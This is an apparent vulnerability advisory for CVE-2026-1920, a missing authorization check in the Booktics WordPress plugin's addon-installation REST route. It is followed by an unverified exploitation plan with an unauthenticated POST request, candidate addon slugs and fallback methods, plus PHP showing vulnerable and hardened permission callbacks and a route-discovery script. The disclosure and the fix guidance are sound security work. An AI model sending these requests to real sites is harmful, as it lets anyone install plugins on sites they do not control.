CVE-2026-1920

Booktics <= 1.0.16 - Missing Authorization to Addon Plugin Installation

Missing Authentication for Critical Function
Severity
medium
CVSS Score
5.3
Patched in
1.0.17
Time to patch
1d

Description

The Booking Calendar for Appointments and Service Businesses – Booktics plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'Extension_Controller::update_item_permissions_check' function in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to install addon plugins.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions
<= 1.0.16
Published
March 9, 2026
Last updated
March 10, 2026
Affected plugin
booktics

What Changed in the Fix

Changes introduced in v1.0.17


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-1920 - Booktics Unauthorized Addon Installation

1. Vulnerability Summary

The Booktics plugin (versions <= 1.0.16) contains a missing authorization vulnerability in its REST API implementation. Specifically, the Extension_Controller::update_item_permissions_check function fails to implement any capability checks (such as current_user_can('install_plugins')). This allows unauthenticated attackers to interact with the extension update endpoint, which triggers the installation of addon plugins.

2. Attack Vector Analysis

  • REST API Endpoint: The vulnerability resides in the Extension_Controller class, which is assumed to register its routes under the booktics/v1 namespace (inferred, not verified; confirm against the plugin's register_rest_route calls).
  • Vulnerable Route: Likely POST or PUT requests to /wp-json/booktics/v1/extensions/(?P<slug>[\w-]+).
  • Vulnerable Function: Extension_Controller::update_item_permissions_check.
  • Authentication: None required (unauthenticated).
  • Preconditions: The Booktics plugin must be active.

3. Code Flow

  1. An HTTP request is sent to the REST API endpoint: POST /wp-json/booktics/v1/extensions/<addon-slug>.
  2. The WordPress REST API server receives the request and matches it to the Extension_Controller routes.
  3. The server calls the permission_callback for the update method: Extension_Controller::update_item_permissions_check.
  4. Vulnerability Point: The update_item_permissions_check function returns true (or lacks a check), granting access to unauthenticated users.
  5. The server then calls the action callback: Extension_Controller::update_item.
  6. The update_item method processes the provided slug and initiates the installation/activation process for the specified addon.
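The permission-callback shape this code flow describes, reconstructed here as an added illustration rather than the plugin's actual source: the vulnerable form grants every caller, the hardened form requires the capabilities WordPress core itself checks for plugin installation and activation. The class names, the booktics/v1 namespace, the /extensions/(?P<slug>[\w-]+) route, the 'booktics' text domain and the elided install logic are all assumptions; only the WordPress core functions and constants are real.

```php
<?php
/**
 * Added illustration (not Booktics source): how a REST route's
 * permission_callback decides who may trigger addon installation.
 * Route, namespace and class names are assumptions taken from the advisory.
 */

// --- Vulnerable shape: the callback never consults the current user. ---
class Extension_Controller_Vulnerable {
    public function register_routes() {
        register_rest_route( 'booktics/v1', '/extensions/(?P<slug>[\w-]+)', [
            'methods'             => WP_REST_Server::EDITABLE,   // POST, PUT, PATCH
            'callback'            => [ $this, 'update_item' ],
            'permission_callback' => [ $this, 'update_item_permissions_check' ],
        ] );
    }

    // Returning true unconditionally makes the route public: WordPress treats a
    // cookie-less request as user 0 and asks only this callback before dispatch.
    public function update_item_permissions_check( WP_REST_Request $request ) {
        return true;
    }

    public function update_item( WP_REST_Request $request ) {
        $slug = sanitize_key( $request['slug'] );
        // ... install/activate logic would run here for any caller (elided) ...
        return rest_ensure_response( [ 'status' => 'installed', 'slug' => $slug ] );
    }
}

// --- Hardened shape: gate on the capabilities the action actually needs. ---
class Extension_Controller_Hardened {
    public function register_routes() {
        register_rest_route( 'booktics/v1', '/extensions/(?P<slug>[\w-]+)', [
            'methods'             => WP_REST_Server::EDITABLE,
            'callback'            => [ $this, 'update_item' ],
            'permission_callback' => [ $this, 'update_item_permissions_check' ],
            'args'                => [
                'slug' => [
                    'required'          => true,
                    // Reject anything that is not a plain slug before the callback runs.
                    'validate_callback' => static function ( $value ) {
                        return is_string( $value ) && preg_match( '/^[a-z0-9-]+$/', $value ) === 1;
                    },
                ],
            ],
        ] );
    }

    public function update_item_permissions_check( WP_REST_Request $request ) {
        // Installing or activating plugins is administrator-level; reuse the same
        // capabilities core checks for those operations (both are withdrawn when
        // DISALLOW_FILE_MODS is set, so this fails closed on locked-down sites).
        if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
            return new WP_Error(
                'rest_forbidden',
                __( 'Sorry, you are not allowed to install extensions.', 'booktics' ),
                // 401 for anonymous callers, 403 for logged-in users lacking the capability.
                [ 'status' => rest_authorization_required_code() ]
            );
        }
        return true;
    }

    public function update_item( WP_REST_Request $request ) {
        $slug = sanitize_key( $request['slug'] );
        // ... install/activate logic, now reachable only by privileged users (elided) ...
        return rest_ensure_response( [ 'status' => 'installed', 'slug' => $slug ] );
    }
}

// Hook the hardened controller up on rest_api_init (hypothetical wiring).
add_action( 'rest_api_init', static function () {
    ( new Extension_Controller_Hardened() )->register_routes();
} );
```

The capability check belongs in permission_callback rather than inside update_item: WordPress evaluates permission_callback for every request (including OPTIONS discovery) before the handler runs, and a WP_Error returned from it short-circuits the request with the HTTP status carried in its data, which is the behaviour the patched version 1.0.17 presumably restores.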

4. Nonce Acquisition Strategy

The vulnerability description says the check is missing entirely, implying the permission_callback returns true (or never consults the current user) regardless of login state.

In WordPress REST API architecture:

  • Cookie authentication is applied only when a logged-in session cookie is accompanied by a valid nonce (the X-WP-Nonce header or the _wpnonce parameter). A request that carries no cookies at all is processed as the unauthenticated user (user ID 0), and no nonce is required because there is no session to protect against CSRF.
  • A request that carries session cookies but no nonce is not rejected; WordPress drops it to the unauthenticated user before dispatch. Only an invalid nonce produces an error response.
  • After that step the API relies solely on the route's permission_callback to authorize the action.
  • Since update_item_permissions_check is broken and returns true, an unauthenticated request with no cookies should pass every control in front of the handler.

No nonce acquisition is required for this exploit.

5. Exploitation Strategy

The goal is to trigger the installation of an addon plugin (e.g., the Stripe addon referenced in assets/build/chunks/js/2031.js).

Step 1: Identify the exact REST route

Confirm the plugin's namespace and the exact extension route before sending any state-changing request.

  • Action: Request the namespace index, GET /wp-json/booktics/v1, which WordPress serves for every registered namespace and which lists each route with the HTTP methods it accepts. WP-CLI (wp rest route list --regex="booktics") is an alternative only when shell access to the target is available.
  • Inferred Route: booktics/v1/extensions/(?P<slug>[\w-]+). The index exposes routes and methods but not their permission callbacks, so a route being listed says nothing about who may call it.
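A small route-discovery helper for this step, added here as an example and not taken from the advisory or the plugin: it parses the JSON a WordPress namespace index returns, merges the method lists of all handlers registered on each route, and prints the routes whose path mentions extensions. The sample index is constructed to mimic the shape of WP_REST_Server::get_namespace_index() output; the booktics routes in it are assumptions, not captured responses.

```php
<?php
/**
 * Added example (not part of the advisory or the plugin): list the routes a
 * WordPress REST namespace index exposes and report the methods each accepts.
 * The sample JSON below is constructed; the booktics routes in it are assumed.
 */

/**
 * Return [ route => [ methods ] ] for every route in a namespace index whose
 * path matches $pattern (a PCRE applied to the route string).
 */
function rest_routes_matching( string $index_json, string $pattern ): array {
    $index = json_decode( $index_json, true );
    if ( ! is_array( $index ) || empty( $index['routes'] ) ) {
        return [];
    }
    $hits = [];
    foreach ( $index['routes'] as $route => $meta ) {
        if ( preg_match( $pattern, $route ) !== 1 ) {
            continue;
        }
        $methods = [];
        // A route carries one "endpoints" entry per registered handler; merge
        // their method lists so POST-only and PUT-only handlers both show up.
        foreach ( $meta['endpoints'] ?? [] as $endpoint ) {
            foreach ( $endpoint['methods'] ?? [] as $m ) {
                $methods[ $m ] = true;
            }
        }
        $hits[ $route ] = array_keys( $methods );
    }
    ksort( $hits );
    return $hits;
}

// Constructed sample of what GET /wp-json/booktics/v1 might return (assumed routes).
$sample_index = <<<'JSON'
{
  "namespace": "booktics/v1",
  "routes": {
    "/booktics/v1": { "namespace": "booktics/v1", "methods": ["GET"], "endpoints": [ { "methods": ["GET"] } ] },
    "/booktics/v1/extensions": { "endpoints": [ { "methods": ["GET"] } ] },
    "/booktics/v1/extensions/(?P<slug>[\\w-]+)": {
      "endpoints": [ { "methods": ["GET"] }, { "methods": ["POST", "PUT", "PATCH"] } ]
    },
    "/booktics/v1/appointments": { "endpoints": [ { "methods": ["GET", "POST"] } ] }
  }
}
JSON;

// Fetch the live index when a site URL is given on the command line; otherwise
// fall back to the constructed sample so the script runs offline.
$json = $sample_index;
if ( PHP_SAPI === 'cli' && isset( $argv[1] ) ) {
    $url  = rtrim( $argv[1], '/' ) . '/wp-json/booktics/v1';
    $body = @file_get_contents( $url );   // anonymous request: no cookies, no nonce
    if ( $body === false ) {
        fwrite( STDERR, "could not fetch $url\n" );
        exit( 1 );
    }
    $json = $body;
}

foreach ( rest_routes_matching( $json, '#/extensions#' ) as $route => $methods ) {
    printf( "%-45s %s\n", $route, implode( ',', $methods ) );
}
```

Run it as php discover.php https://target.example to query a real site (file_get_contents over HTTP needs allow_url_fopen enabled), or with no argument to exercise the parser against the sample. Because the index never reveals permission callbacks, a listed EDITABLE route is only a candidate; whether it is reachable anonymously is settled by reading the plugin source or by an authorized test request.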

Step 2: Identify valid addon slugs

Based on the source files, stripe is a valid extension.

  • Potential Slugs: stripe, google-calendar, whatsapp, subscription.

Step 3: Execute the installation request

Send a POST request to the extension endpoint.

  • Tool: http_request
  • Method: POST
  • URL: http://localhost:8080/wp-json/booktics/v1/extensions/stripe
  • Headers: Content-Type: application/json
  • Body: {} (The endpoint likely uses the slug from the URL to determine which plugin to install).

6. Test Data Setup

  1. Install and activate Booktics version 1.0.16.
  2. Ensure no Booktics addons (like Booktics Stripe) are currently installed or active.
  3. Set the WordPress environment to allow outgoing requests if the plugin fetches addons from an external repository.

7. Expected Results

  • The REST API should return a 200 OK or 201 Created status code.
  • The response body should contain confirmation of the installation or the current status of the extension (e.g., {"status": "installed"}).
  • A new plugin directory (e.g., wp-content/plugins/booktics-stripe/) should be created.

8. Verification Steps

After sending the HTTP request, verify the results using WP-CLI:

  1. Check Plugin Directory:
    ls -la /var/www/html/wp-content/plugins/
    Confirm if a new addon folder (e.g., booktics-stripe) exists.
  2. Check Plugin List:
    wp plugin list
    Confirm the status of the new addon. It may be installed but inactive, or installed and active depending on the update_item logic.
  3. Check Plugin Options:
    wp option get booktics_extensions (inferred option name) to see if the internal state has been updated.

9. Alternative Approaches

If the POST request to /extensions/<slug> fails:

  1. Try different methods: Some WordPress developers use GET for actions that should be POST, or require PUT. Try PUT /wp-json/booktics/v1/extensions/stripe.
  2. Try different parameters: The endpoint might require a specific JSON body, such as {"action": "install"} or {"active": true}.
  3. Discover through WP-CLI: Use wp rest route list to see if there are other endpoints related to "addons" or "modules" if "extensions" is not the correct term used in the final route registration.
